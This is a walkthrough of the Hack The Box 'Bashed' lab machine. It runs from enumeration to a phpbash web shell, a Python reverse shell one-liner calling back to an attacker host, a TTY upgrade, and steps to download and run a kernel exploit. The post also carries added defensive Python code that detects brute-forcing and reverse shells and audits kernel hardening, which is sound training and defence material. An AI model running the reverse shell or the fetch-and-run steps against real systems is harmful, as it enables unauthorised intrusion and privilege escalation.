Bashed is a fairly straightforward box. Let’s start the walkthrough with basic enumeration!
[sourcecode language="bash" wraplines="false" collapse="false"]
nmap -sC -sV -oA bashed 10.10.10.68
[/sourcecode]
Only port 80 is open. The next steps are to navigate to the web page and have DirBuster running in the background to enumerate any web pages.
[hr]
The landing page's text makes it safe to assume that an instance of phpbash is running on this server. If we can find it, we will have our way in. While looking at the landing page, we also had Dirb running in the background with the default Dirb folder/file list (/usr/share/dirb/wordlists/common.txt).
Alright, there’s a /dev/ page and when we navigate to it, we find the phpbash instance link at http://10.10.10.68/dev/phpbash.php.
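From the defender's side, a Dirb/DirBuster run like this is loud: one client producing many distinct 404s in a short window. The following is an added example (not part of the original walkthrough) that parses Apache/nginx combined-format access logs and flags such clients; the log lines, the 60-second window and the 20-path threshold are constructed choices, and the function names are my own.

```python
"""Spot directory brute-forcing (Dirb/DirBuster style) in web access logs.

Added example, not part of the original walkthrough. It parses Apache/nginx
"combined" format lines and flags any client that produces many distinct
404 paths inside a short window. Every log line below is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format: ip ident user [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict (ip, time, method, path, status, ua) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforcers(lines, window=timedelta(seconds=60), threshold=20):
    """Map client IP -> peak number of distinct 404 paths seen in any `window`,
    for clients whose peak reaches `threshold`. Unparseable lines are skipped."""
    misses = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            misses[rec["ip"]].append((rec["time"], rec["path"]))

    flagged = {}
    for ip, hits in misses.items():
        hits.sort()
        peak, start = 0, 0
        for end in range(len(hits)):
            # slide the window start forward until the span fits inside `window`
            while hits[end][0] - hits[start][0] > window:
                start += 1
            peak = max(peak, len({path for _, path in hits[start:end + 1]}))
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def _line(ip, when, path, status, ua="Mozilla/5.0 (constructed)"):
    return f'{ip} - - [{when.strftime(TIME_FMT)}] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'


def constructed_sample():
    """Constructed log: one client walking a wordlist one request per second
    (only /dev exists, as in the walkthrough), plus an ordinary visitor."""
    t0 = datetime.strptime("10/Jan/2018:12:00:00 +0000", TIME_FMT)
    words = ("admin backup cgi-bin config css dev images include js lib login logs "
             "old php phpmyadmin private scripts test tmp upload uploads vendor").split()
    lines = [_line("10.10.14.5", t0 + timedelta(seconds=i), f"/{w}", 200 if w == "dev" else 404)
             for i, w in enumerate(words)]
    lines.append(_line("10.10.14.99", t0 + timedelta(seconds=5), "/index.php", 200))
    lines.append(_line("10.10.14.99", t0 + timedelta(seconds=6), "/favicon.ico", 404))
    lines.append("not a log line")  # exercises the unparseable-line path
    return lines


SAMPLE_LOG = constructed_sample()

if __name__ == "__main__":
    for ip, peak in find_bruteforcers(SAMPLE_LOG).items():
        print(f"{ip}: {peak} distinct 404s within 60s (possible directory brute force)")
```

Run against a real log with `find_bruteforcers(open("/var/log/apache2/access.log"))`; the ordinary visitor with a single missing favicon never reaches the threshold, while the wordlist walk does.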
[hr]
First, we enumerate the basics we have access to, checking for low-hanging fruit right off the bat. We find we are www-data, which makes sense for a web-based implementation. We look at the /etc/passwd and /etc/shadow permissions, check for cron jobs, and enumerate any users.
[hr]
We've got some basic information on the box, but let's get a shell to do more in-depth digging. Since we have a literal bash session, let's just use one of the many different methods to pop a reverse shell. I'm going to reference the Reverse Shell Cheat Sheet by Pentestmonkey. I've decided to run with the Python reverse shell:
[sourcecode language="python" wraplines="false" collapse="false"]
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
[/sourcecode]
We start a Netcat listener on the Kali box and run the Python reverse shell command on the PHP Bash instance.
Let’s clean this shell up a bit and add tab autocompletion with the following commands:
[sourcecode language="bash" wraplines="false" collapse="false"]
# Check whether Python exists on the box
which python
# Spawn a full pseudo-terminal
python -c 'import pty; pty.spawn("/bin/bash");'
[/sourcecode]
We have a pseudo-terminal but no auto-completion. In order to get auto-completion, we need to put in a bit more work. Below is the simple process to get shell auto-completion.
[sourcecode language="bash" wraplines="false" collapse="false"]
# Background the current shell with ctrl-z
stty raw -echo
fg
[/sourcecode]
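Both the reverse shell above and the pty upgrade leave a distinctive trace in process telemetry: the web server's user running an interpreter, a socket descriptor duplicated onto stdin/stdout/stderr, a pty.spawn call, an explicit `-i` shell. As an added example that is not part of the original walkthrough, here is a small Python classifier run over a constructed process snapshot in which two records replay the exact commands shown above; the record format, the set names and the reason labels are assumptions of the example.

```python
"""Flag reverse-shell and TTY-upgrade behaviour in process records.

Added example, not part of the original walkthrough. The records mimic a
`ps -eo pid,user,comm,args` snapshot joined with the parent's command name;
they are constructed. Two of them replay the commands used in the post.
"""
import os
import re

WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm", "php-fpm7.0"}
WEB_USERS = {"www-data", "apache", "nginx", "http"}
INTERPRETERS = {"sh", "bash", "dash", "python", "python2", "python2.7", "python3",
                "perl", "php", "nc", "ncat"}

# (reason, pattern) checked against the full command line, in this order
INDICATORS = [
    # a socket's fd copied onto stdin/stdout/stderr: the shape of the Python reverse shell
    ("socket_fd_dup", re.compile(r"socket\.socket.*dup2|dup2.*socket\.socket", re.S)),
    # pty.spawn: upgrading a dumb shell to a full pseudo-terminal
    ("pty_upgrade", re.compile(r"pty\.spawn\(")),
    # an interactive shell requested explicitly, e.g. ["/bin/sh","-i"] or /bin/bash -i
    ("interactive_shell", re.compile(r"""/bin/(?:ba|da)?sh["']?[\s,]+["']?-i\b""")),
]


def classify(user, parent_comm, cmdline):
    """Return the reasons a process record looks like a web-shell foothold (empty list if none)."""
    reasons = []
    tokens = cmdline.split()
    exe = os.path.basename(tokens[0]) if tokens else ""
    if parent_comm in WEB_SERVERS and exe in INTERPRETERS:
        reasons.append("web_server_spawned_interpreter")
    if user in WEB_USERS and exe in INTERPRETERS:
        reasons.append("web_user_running_interpreter")
    for reason, pattern in INDICATORS:
        if pattern.search(cmdline):
            reasons.append(reason)
    return reasons


def scan(records):
    """records: iterable of dicts with pid, user, parent, cmdline. Returns {pid: reasons} for hits."""
    hits = {}
    for r in records:
        reasons = classify(r["user"], r["parent"], r["cmdline"])
        if reasons:
            hits[r["pid"]] = reasons
    return hits


# Constructed snapshot: pids 1337 and 1338 replay the walkthrough's commands, the rest are benign.
REVERSE_SHELL = ('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
                 's.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
                 'os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'')
SAMPLE_PROCS = [
    {"pid": 1337, "user": "www-data", "parent": "apache2", "cmdline": REVERSE_SHELL},
    {"pid": 1338, "user": "www-data", "parent": "sh",
     "cmdline": "python -c 'import pty; pty.spawn(\"/bin/bash\");'"},
    {"pid": 2000, "user": "root", "parent": "cron", "cmdline": "/usr/bin/python /opt/backup.py"},
    {"pid": 2001, "user": "www-data", "parent": "apache2", "cmdline": "/usr/sbin/apache2 -k start"},
    {"pid": 2002, "user": "scriptmanager", "parent": "bash", "cmdline": "python /scripts/test.py"},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_PROCS).items():
        print(pid, ", ".join(reasons))
```

The two structural checks (web server parent, web service account) are the ones that survive payload changes; the regex indicators are cheap confirmation. An Apache worker spawning another Apache worker, or root's cron running a backup script, produces no hit.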
[hr]
We've already looked at the passwd and shadow permissions, enumerated cron jobs, and finally found all users by looking at the home directory. Another thing we should always do is check for sudo permissions (sudo -l). In this case, though, I know that user scriptmanager has sudo rights, but it's not the path of least resistance.
In our enumeration, we should always check for out-of-date kernels by running uname -r or uname -a. In our case, we're working with:
[box style="rounded" border="full"]Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux[/box]
[hr]
Googling "Linux 4.4.0 exploits" brings up the following results:
Looking at the first link, it's a DCCP exploit. DCCP is the Datagram Congestion Control Protocol (UDP). It's an obscure and vulnerable protocol that we can take advantage of by essentially crashing the kernel and escalating our privileges to root.
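This is exactly the check a hardening review runs in reverse: confirm the kernel is at or past a patched release, and confirm the dccp module cannot be loaded at all (for a protocol nobody on the box needs, `install dccp /bin/true` in modprobe.d is the usual answer). The block below is an added example, not code from the walkthrough or from ExploitDB: it parses the `uname -a` line shown above, compares the release against a placeholder baseline (PATCHED_BASELINE, which you would replace with your distribution's fixed release), and classifies a constructed modprobe.d file; the function names are my own.

```python
"""Kernel-release check and DCCP module hardening check.

Added example, not part of the original walkthrough. It pulls the release
string out of `uname -a` output, compares it against a patched baseline, and
inspects modprobe.d text for the 'install dccp /bin/true' override that keeps
the module from loading. The baseline release is a placeholder; the uname
line is the one quoted in the post.
"""
import re

KREL_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(\d+))?")

# PLACEHOLDER: replace with the first release your distribution ships the fix in
PATCHED_BASELINE = "4.4.0-99-generic"


def parse_kernel_release(release):
    """'4.4.0-62-generic' -> (4, 4, 0, 62); the ABI number defaults to 0 when absent."""
    m = KREL_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch, abi = m.groups()
    return (int(major), int(minor), int(patch), int(abi or 0))


def release_from_uname(uname_a):
    """The release is the third whitespace-separated field of `uname -a`."""
    fields = uname_a.split()
    if len(fields) < 3:
        raise ValueError("expected `uname -a` output")
    return fields[2]


def is_older_than(release, baseline=PATCHED_BASELINE):
    """Tuple comparison handles 4.15 vs 4.4 correctly (no string ordering)."""
    return parse_kernel_release(release) < parse_kernel_release(baseline)


def dccp_module_status(modprobe_conf):
    """Classify modprobe.d text as 'install-override' (install dccp /bin/true|false,
    which blocks every load path), 'blacklist-only' (blacklist dccp, which only
    suppresses alias-based autoloading), or 'not-disabled'."""
    status = "not-disabled"
    for raw in modprobe_conf.splitlines():
        tokens = raw.split("#", 1)[0].split()  # drop comments
        if (len(tokens) >= 3 and tokens[0] == "install" and tokens[1] == "dccp"
                and tokens[2] in ("/bin/true", "/bin/false")):
            return "install-override"
        if len(tokens) >= 2 and tokens[0] == "blacklist" and tokens[1] == "dccp":
            status = "blacklist-only"
    return status


def audit(uname_a, modprobe_conf, baseline=PATCHED_BASELINE):
    """Return the findings a hardening check would report for this host."""
    release = release_from_uname(uname_a)
    findings = []
    if is_older_than(release, baseline):
        findings.append(f"kernel {release} is older than baseline {baseline}")
    if dccp_module_status(modprobe_conf) != "install-override":
        findings.append("dccp module is not prevented from loading")
    return findings


UNAME_FROM_PAGE = ("Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 "
                   "x86_64 x86_64 x86_64 GNU/Linux")
# constructed contents of a /etc/modprobe.d/disable-dccp.conf
CONSTRUCTED_MODPROBE = "# constructed: keep dccp from loading\ninstall dccp /bin/true\n"

if __name__ == "__main__":
    for finding in audit(UNAME_FROM_PAGE, ""):
        print("FINDING:", finding)
    print("after hardening:", audit(UNAME_FROM_PAGE, CONSTRUCTED_MODPROBE))
```

On a live host you would feed `audit()` the output of `uname -a` and the concatenated contents of /etc/modprobe.d/*.conf; an empty findings list means the kernel is at or past the baseline and the module is pinned to `/bin/true`.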
First, get the raw code from ExploitDB and compile it on your Kali machine (gcc <program.c> -o pwn).
Second, start an HTTP server in order to download the binary to Bashed.
[sourcecode language="bash" wraplines="false" collapse="false"]
python -m SimpleHTTPServer 1234
[/sourcecode]
Third, wget the binary, change permissions, and execute.